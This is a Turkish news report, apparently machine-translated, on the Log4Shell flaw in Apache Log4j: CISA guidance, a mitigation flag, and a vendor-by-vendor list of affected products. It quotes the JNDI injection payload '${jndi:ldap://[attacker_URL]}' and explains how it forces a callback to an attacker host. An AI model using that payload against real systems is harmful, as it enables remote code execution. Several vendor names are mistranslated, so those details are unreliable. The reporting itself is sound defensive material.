Apache Log4j günlük kitaplığındaki kritik bir güvenlik açığıyla ilgili haberler, geçen hafta Perşembe günü kavram kanıtı açıklarının ortaya çıkmaya başlamasıyla kırıldı.
Log4j, dünya çapındaki satıcıların çeşitli uygulamalarında kurumsal düzeyde kullanılan Apache Logging Services’in açık kaynaklı bir Java günlük kaydı çerçevesi parçasıdır.
Apache, şu anda olarak izlenen maksimum önemdeki güvenlik açığını gidermek için Log4j 2.15.0’ı yayınladı. CVE-2021-44228, Log4Shell veya LogJam olarak da anılır.
Cloudflare ve Cisco Talos’tan alınan verilere göre, büyük istismar ancak istismar kodunun ücretsiz olarak kullanılabilir hale gelmesinden sonra başlarken, ayın başından beri saldırılar tespit edildi.
Log4Shell açığı, Alibaba’nın Bulut güvenlik ekibi tarafından 24 Kasım’da bildirildi ve bazı saldırganların bu açığı nasıl bu kadar kısa sürede kullanabildikleri belirsiz.
Cumartesi günü Log4Shell güvenlik açığı hakkında yaptığı açıklamada, Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) direktörü Jen Easterly, ajansın sorunu çözmek için özel ve kamu sektöründeki ortaklarla birlikte çalıştığını söyledi.
“Bu güvenlik açığının azaltılmasını sağlamak ve ilişkili herhangi bir tehdit etkinliğini tespit etmek için acil önlemler alıyoruz. Bu güvenlik açığı, federal sivil kurumları – ve federal olmayan ortaklara sinyalleri – bu güvenlik açığını acilen düzeltmeye veya düzeltmeye zorlayan, istismar edildiği bilinen güvenlik açıkları kataloğumuza ekledik” – jen paskalya, CISA Direktörü
Log4Shell, kimliği doğrulanmamış uzaktan kod yürütülmesine izin veren bir Java Adlandırma ve Dizin Arabirimi (JNDI) enjeksiyonudur. Düşmanlar, tarayıcılarındaki kullanıcı aracısını aşağıdaki biçimde bir dizeye değiştirerek bundan yararlanabilir: ${jndi:ldap://[attacker_URL]}
.
Dize, kurbanın web sunucusunun günlüklerinde kalacak ve Log4j kitaplığı onu ayrıştırdığında saldırganın URL’sine bir geri arama veya istekte bulunmaya zorlayacaktır. Saldırganlar, kodlanmış komutları veya Java sınıflarını savunmasız makineye geçirmek için dizeyi kullanabilir.
Öneriler, bildirimler, yamalar veya güncellemeler
Güvenlik açığının ciddiyeti ve bundan yararlanmanın ne kadar kolay olduğu göz önüne alındığında, CISA bugün şirketlerin Log4Shell saldırılarına karşı savunma kurmaları için bir kılavuz yayınladı. Ajansın tavsiyesi “mevcut yamaların hemen uygulanması” ve bu sürece öncelik verilmesidir.
“Kritik görev sistemleri, internete bakan sistemler ve ağ bağlantılı sunuculardan başlayarak yama oluşturmaya öncelik verin. Ardından, etkilenen diğer bilgi teknolojisi ve operasyonel teknoloji varlıklarını yamalamaya öncelik verin” – CISA
Yama mümkün değilse, ajans aşağıdaki değişikliği önerir:
Ayarlamak log4j2.formatMsgNoLookups
dizeyi ekleyerek true değerine -Dlog4j2.formatMsgNoLookups=True
bir uygulamayı başlatmak için Java Sanal Makinesi komutuna
Bu, mesaj biçimlendirme için Aramalara dayanıyorsa, sistemin günlük kaydının etkilenebileceği uyarısıyla birlikte gelir. Ayrıca, azaltma yalnızca 2.10 ve sonraki sürümler için çalışır.
Log4Shell ile ilgili ayrıntılar ortaya çıktıktan hemen sonra, satıcılar ürünlerinin etkilenip etkilenmediğini araştırmaya başladı ve sonuçlar hakkında bilgi verdi:
Amazon:
Amazon, birkaç ürününü Log4j bileşeninin güvenlik açığı olmayan bir sürümünü kullanacak şekilde güncelledi ve diğerlerini güncelleme sürecinde olduğunu veya yakın gelecekte yeni sürümler yayınlayacağını duyurdu.
şirket var yayınlanan ayrıntılar OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass ve API Gateway bunların arasında etkilenen hizmetlere özeldir.
Atlassian:
Şirket, yaptığı değerlendirmeye göre, hiçbir şirket içi ürünün varsayılan yapılandırmalarında istismara açık olmadığına inanıyor.
JMS Appender işlevselliğini etkinleştirmek için varsayılan günlük yapılandırmasını (log4j.properties) değiştirmek, Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & gibi bazı ürünlerde uzaktan kod yürütme riskini getirebilir. Veri Merkezi, Balıkgözü ve Pota.
Broadcom:
Şirket yayınlanan Log4j güvenlik açığından etkilenen birkaç Symantec ürünü için azaltıcı önlemler ve bilgi bankası makaleleri. Bunlara CA Gelişmiş Kimlik Doğrulama, Symantec SiteMinder (CA Tek Oturum Açma), VIP Kimlik Doğrulama Merkezi ve Symantec Endpoint Protection Manager (SEPM) dahildir.
Cisco:
Cisco’nun sahip olduğu yayınlanan Log4Shell’den etkilenen ürünlerinin bir listesi ve 14 Aralık’tan itibaren bazılarının yamalanması için bir takvim.
Etkilenen ürünler, aşağıdakiler de dahil olmak üzere çeşitli kategorilerdendir:
- Ağ ve içerik güvenlik cihazları (Identity Services Engine, Firepower Threat Defense, Advanced Web Security Reporting Application)
- İşbirliği ve sosyal medya (Cisco Webex Meetings Sunucusu)
- Ağ yönetimi ve sağlama (Cisco CloudCenter Suite Yöneticisi, Veri Merkezi Ağ Yöneticisi, IoT Kontrol Merkezi, Ağ Hizmetleri Orkestratörü, WAN Otomasyon Motoru)
- Kurumsal yönlendirme ve anahtarlama (Cisco Network Assurance Engine ve Cisco SD-WAN vManage)
Citrix:
Soruşturma devam ederken ve bazı ürünleri için durum değişebilirken, Citrix hiçbir ürününü Log4Shell’e karşı savunmasız olarak listelemedi.
ConnectWise:
Şirketin bulut hizmeti Perch’in “potansiyel olarak savunmasız” olan üçüncü taraf bileşenlerine güvendiği tespit edildi. danışma ConnectWise’dan.
Güvenlik açığı bulunan üçüncü taraf, ConnectWise’ın StratoZen çözümü tarafından kullanılan FortiGuard’ın FortiSIEM’i olarak tanımlandı ve şirketin barındırılan StratoZen sunucularına erişimi geçici olarak kısıtlamasını istedi. Erişim artık hizmetlerin çoğuna geri yüklendi.
cPanel:
Bir forum dizisi, yalnızca cPanel Solr eklentisinin mevcut olduğu örneklerin etkilendiğini ve bunlardan yararlanılabileceğini, ancak yalnızca yerel olarak gösteriyor.
Bir personel, ek bir fikir verdi ve bir azaltma ile güncelleme Log4Shell için cpanel-dovecot-solr paketinde mevcuttur.
Debian:
Yamalı Log4j paketi Debian 9 (Stretch), 10 (Buster), 11 (Bullseye) ve 12 (Bookworm)’a bir güvenlik güncellemesi olarak eklendi, danışma.
Liman işçisi:
Bir düzine Docker Resmi görüntüsünün Log4j kitaplığının güvenlik açığı bulunan bir sürümünü kullandığı bulundu. Liste şunları içerir: kanepe tabanı, elastik arama, kütük deposu, sonarkube, ve solr.
Liman işçisi diyor “Bu görüntülerdeki Log4j 2’yi mevcut en son sürüme güncelleme sürecinde” olduğunu ve görüntülerin başka nedenlerle savunmasız olmayabileceğini.
FortiGuard:
Şirketten bir tavsiye, neredeyse bir düzine ürününü savunmasız olarak listeliyor ve bunlardan dördü için düzeltmeler veya azaltmalar halihazırda uygulanmış durumda.
FortiGuard açıkladı danışma FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy ve ShieldX gibi diğer ürünler için düzeltme uygulama tarihleriyle güncellenecektir.
F-Güvenli:
Birkaç F-Secure ürününün hem Windows hem de Linux sürümleri Log4Shell’den etkilenir: Policy Manager (yalnızca Policy Manager Server bileşeni), Policy Manager Proxy, Endpoint Proxy ve Elements Connector.
Şirket, yöneticilerin sorunu düzeltmesi için bir güvenlik yaması oluşturmuş ve adım adım talimatlar dağıtmak için.
Kılavuz:
NSA’nın açık kaynaklı tersine mühendislik aracı, Güncelleme Log4j bağımlılığını da savunmasız olmayan bir yinelemeye yükselten sürüm 10.1’e.
IBM:
IBM’in danışma Log4Shell için, Yönetici Konsolu ve UDDI Kayıt Uygulaması bileşenleri aracılığıyla yalnızca WebSphere Application Server 9.0 ve 8.5 sürümlerinin güvenlik açığından etkilendiğini ve sorunun giderildiğini gösterir.
Ardıç Ağları:
ağ şirketi ifşa dört ürününün etkilendiğini bildirdi: Paragon Active Assurance, Paragon Insights, Paragon Pathfinder ve Paragon Planner.
Değerlendirme devam ederken, bu aşamada altı ürün daha etkilenebilir: JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics ve Security Director (Security Director Insights değil)
McAfee:
Şirket henüz değerlendirmesini tamamlamadı ve incelenmekte olan 12 ürünü var ve danışma kullanılabilir hale geldikçe ilgili bilgilerle birlikte.
MongoDB:
Şirket, Log4Shell’e karşı yalnızca MongoDB Atlas Search’ün yamalanması gerektiğini belirtiyor. danışma bugün güncellendi
Geliştirici, yamayı dağıtmadan önce herhangi bir istismar kanıtı veya uzlaşma göstergesi bulamadığını ekliyor.
sekiz:
sekiz yayınlanan güncellemeler Okta RADIUS Server Agent ve Okta On-Prem MFA Agent için Log4Shell güvenlik açığı riskini azaltmak ve müşterilerin düzeltmeleri Yönetici Konsolu’ndan uygulamalarını şiddetle tavsiye eder.
kehanet:
kehanet söz konusu ürünlerinin “birkaçının”, hangilerinin veya kaçının Log4j bileşeninin savunmasız bir sürümünü kullandığını açıklamadan.
Şirket, müşterilerini My Oracle Support Document’a yönlendirdi ve bir güvenlik uyarısı sağlanan güncellemeleri “mümkün olan en kısa sürede” uygulamak için güçlü bir tavsiye ile.
OWASP Vakfı:
Bir danışma Cuma günü, Zed Attack Proxy (ZAP) web uygulaması tarayıcısının 2.11.1’in altındaki sürümlerinin savunmasız bir Log4j bileşeni kullandığını ortaya çıkardı.
Kırmızı şapka:
Birden çok Red Hat ürünündeki bileşenler, kuruluş olan Log4Shell’den etkilenir. ifşa Cuma günü, müşterilere güncellemeleri kullanıma sunulur sunulmaz uygulamalarını şiddetle tavsiye ediyoruz.
Danışmanlıkta listelenen ürünler arasında Red Hat OpenShift 4 ve 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8 ve Red Hat Fuse 7 yer alıyor.
Güneş Rüzgarları:
Firmadan iki ürün savunmasız bir sürüm kullan Apache Log4j: Sunucu ve Uygulama İzleyicisi (SAM) ve Veritabanı Performans Çözümleyicisi (DPA).
Ancak, her iki ürün de Logj4 güvenlik açığından etkilenmeyen veya riski azaltan Java Geliştirme Kiti’nin (JDK) bir sürümünü kullanır.
SonicDuvar:
Devam eden bir araştırma, SonicWall’ın Email Security 10.x sürümünün Log4Shell güvenlik açığından etkilendiğini ortaya çıkardı. Bir düzeltme geliştirilme aşamasındadır ve “kısa süre içinde” piyasaya sürülmelidir.
SonicWall’ın diğer beş ürünü hala inceleniyor ve geri kalanının sorundan etkilenmediği bulundu. danışma şirketten en son Cumartesi günü güncellendi.
atılgan:
Data Fabric Search kullanılmadığı sürece Core Splunk Enterprise etkilenmez. Şirket, hem bulutta hem de şirket içinde Log4Shell’den etkilenen ürünlerinin sürümlerini içeren bir tablo yayınladı.
Yazının yazıldığı sırada şirket, yayınlanan düzeltmeler bazı ürünler için ve şu anda ürünlerinden en az yedisi için sürekli güncellemeler üzerinde çalışıyor.
sanal makine yazılımı:
VMware, Log4Shell saldırılarına karşı savunmasız birkaç ürününü düzeltti ve şu anda 27 ürün için daha yamalar çıkarmaya çalışıyor.
içinde danışma En son bugün güncellenen şirket, kritik güvenlik açığından etkilenen yaklaşık 40 ürününü listeliyor. Birçoğunda “Yama Beklemede” görünüyor ve bazı durumlarda azaltıcı önlemler mevcut.
Ubiquiti:
Log4j kitaplığını kullanan UniFi Ağ Uygulaması, güncellenmiş kritik Log4Shell güvenlik açığını gidermek için.
Ubuntu:
Log4j paketi yukarı yönde yamalandı, güvenlik danışmanlığı, ve güncellemenin şimdi Ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo) ve 21.10 (Impish Indri) olarak damlaması gerekiyor.
Zoho:
Şirket, ManageEngine izleme çözümünün bir parçası olan Active Directory değişikliklerini denetlemeye yönelik ADAudit Plus bileşeninin Log4Shell saldırılarına karşı savunmasız olduğunu tespit etti.
Bugün kısa bir gönderide Zoho, sağlanan talimatlar sorunu hafifletmek için.
Zscaler:
Zscaler’ın sahip olduğu yamalı Log4j kitaplığının savunmasız bir sürümünü kullanan birkaç ürünü. Genel internet, Zscaler Mobil Yönetici ve Destek Mobil Yönetici bileşenlerine yönelik tüm Özel Erişim (ZPA) hizmetlerini yamaladıktan sonra şirket, sorunun tüm ürünlerinde çözüldüğü sonucuna vardı.
Bazı şirketler, belirli Java sürümlerini çalıştırmanın herhangi bir istismar girişimini dağıtacağına inanarak Log4Shell güvenlik açığına karşı önlem almamayı seçebilir. Yine de bu doğru değil ve Log4j kitaplığını en son yinelemeye güncellemeleri gerekiyor.
Canva grafik tasarım platformunda kıdemli güvenlik mühendisi olan Márcio Almeida, JNDI yararlanma kitinde LDAP serileştirilmiş yükleri için destek eklerken Log4Shell saldırılarının herhangi bir Java sürümüyle çalıştığı konusunda uyarıyor.
Araştırmacı, saldırının herhangi bir Java sürümüyle çalışabilmesi için serileştirilmiş yükte kullanılan sınıfların uygulama sınıf yolunda olması gerektiğini açıklıyor.